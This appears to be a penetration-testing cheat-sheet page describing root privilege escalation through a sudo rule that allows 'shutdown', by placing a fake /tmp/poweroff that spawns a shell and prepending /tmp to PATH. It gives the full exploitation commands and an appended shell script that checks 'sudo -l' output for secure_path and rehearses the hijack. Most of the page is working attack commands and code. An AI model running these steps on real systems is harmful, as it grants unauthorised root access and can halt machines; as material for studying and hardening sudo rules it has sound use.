Sudo Shutdown, Poweroff Privilege Escalation
Last modified: 2023-02-05
If sudo lets us run the "shutdown" command as root, it may be exploitable for privilege escalation (PrivEsc) through a PATH hijack of "poweroff".
Investigation
sudo -l
(ALL) NOPASSWD: /usr/sbin/shutdown
If we can execute "shutdown" as root and that shutdown implementation locates "poweroff" by name through PATH rather than by an absolute path, we can place a fake "poweroff" in a directory we control and have it run as root. This only works when sudo keeps our PATH: if the "Matching Defaults entries" line of "sudo -l" shows "secure_path=...", sudo replaces PATH with that fixed list and a fake binary in /tmp is never found.
Exploitation
First create a /tmp/poweroff script that invokes a shell. A shebang line makes it work whether "shutdown" runs it through a shell or execs it directly.
printf '#!/bin/sh\nexec /bin/sh\n' > /tmp/poweroff
# or
printf '#!/bin/sh\nexec /bin/bash\n' > /tmp/poweroff
Then make the file executable and put "/tmp" at the front of PATH so it is searched before /usr/sbin and /sbin.
chmod +x /tmp/poweroff
export PATH=/tmp:$PATH
Now execute "shutdown" as root. Be aware that if the hijack does not take (for example because secure_path is set), the real poweroff runs and the machine actually shuts down.
# Allowed by the sudoers rule above; sudo must keep our PATH for this to work
sudo /usr/sbin/shutdown
# Then you are root user
root>
/tmp/poweroff is executed as root and spawns a root shell.
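The following shell script is an added example, not part of the original write-up. It bundles the two checks a practitioner wants before trying the steps above (does the sudoers rule allow shutdown, and is secure_path absent so our PATH survives into the root process) with an unprivileged rehearsal of the hijack. The "sudo -l" texts are constructed samples, the stand-in "shutdown" script only simulates an implementation that looks up "poweroff" through PATH (the page assumes, but does not show, that the target's shutdown behaves that way), and the payload runs as your own uid here rather than as root.

```shell
#!/bin/sh
# Added example, not from the original write-up: check whether the PATH
# hijack can work and rehearse it locally without sudo or root.
#
# Assumptions (not stated on the page): the target's shutdown looks up
# "poweroff" through PATH; the `sudo -l` texts below are constructed samples;
# the stand-in "shutdown" here replaces /usr/sbin/shutdown for the rehearsal.

# Constructed `sudo -l` output for a host whose sudoers keeps the caller's PATH.
SAMPLE_SUDO_L_HIJACKABLE='Matching Defaults entries for user on target:
    mail_badpass

User user may run the following commands on target:
    (ALL) NOPASSWD: /usr/sbin/shutdown'

# Constructed `sudo -l` output for a Debian/Ubuntu-style host: secure_path
# replaces PATH, so a fake poweroff in /tmp is never found.
SAMPLE_SUDO_L_BLOCKED='Matching Defaults entries for user on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user may run the following commands on target:
    (ALL) NOPASSWD: /usr/sbin/shutdown'

# Reads `sudo -l` output on stdin. Returns 0 only if shutdown is allowed
# and no secure_path is set, i.e. our PATH survives into the root process.
path_hijack_possible() {
    out=$(cat)
    printf '%s\n' "$out" | grep -q '/usr/sbin/shutdown' || return 1
    if printf '%s\n' "$out" | grep -q 'secure_path='; then
        return 1
    fi
    return 0
}

# Write the payload the write-up describes, with a shebang so it runs whether
# shutdown reaches it through a shell or through execve.
# $1 = directory to drop it in (/tmp on the target).
make_fake_poweroff() {
    cat > "$1/poweroff" <<'EOF'
#!/bin/sh
exec /bin/sh
EOF
    chmod +x "$1/poweroff"
}

# Which "poweroff" a PATH lookup resolves to once $1 is prepended to PATH.
resolved_poweroff() {
    (PATH="$1:$PATH"; command -v poweroff)
}

# Unprivileged rehearsal: a stand-in shutdown that calls poweroff by bare name,
# as a PATH-dependent implementation would. Prints the uid the payload runs as
# (your own here; 0 when the real shutdown is run via sudo on the target).
simulate_hijack() {
    make_fake_poweroff "$1"
    printf '#!/bin/sh\nexec poweroff\n' > "$1/shutdown"
    chmod +x "$1/shutdown"
    # The payload's /bin/sh reads its commands from our stdin.
    printf 'id -u\n' | (PATH="$1:$PATH"; "$1/shutdown")
}

# Run the rehearsal end to end:  RUN_DEMO=1 sh this_script.sh
if [ "${RUN_DEMO:-0}" = 1 ]; then
    scratch=$(mktemp -d)
    if printf '%s\n' "$SAMPLE_SUDO_L_BLOCKED" | path_hijack_possible; then
        echo "secure_path sample: hijackable"
    else
        echo "secure_path sample: blocked by secure_path"
    fi
    echo "payload ran as uid $(simulate_hijack "$scratch")"
    echo "poweroff now resolves to $(resolved_poweroff "$scratch")"
    rm -rf "$scratch"
fi
```

On a real target, feed the actual "sudo -l" output to path_hijack_possible before running anything: a secure_path entry means the fake poweroff will be skipped and the real one will halt the box.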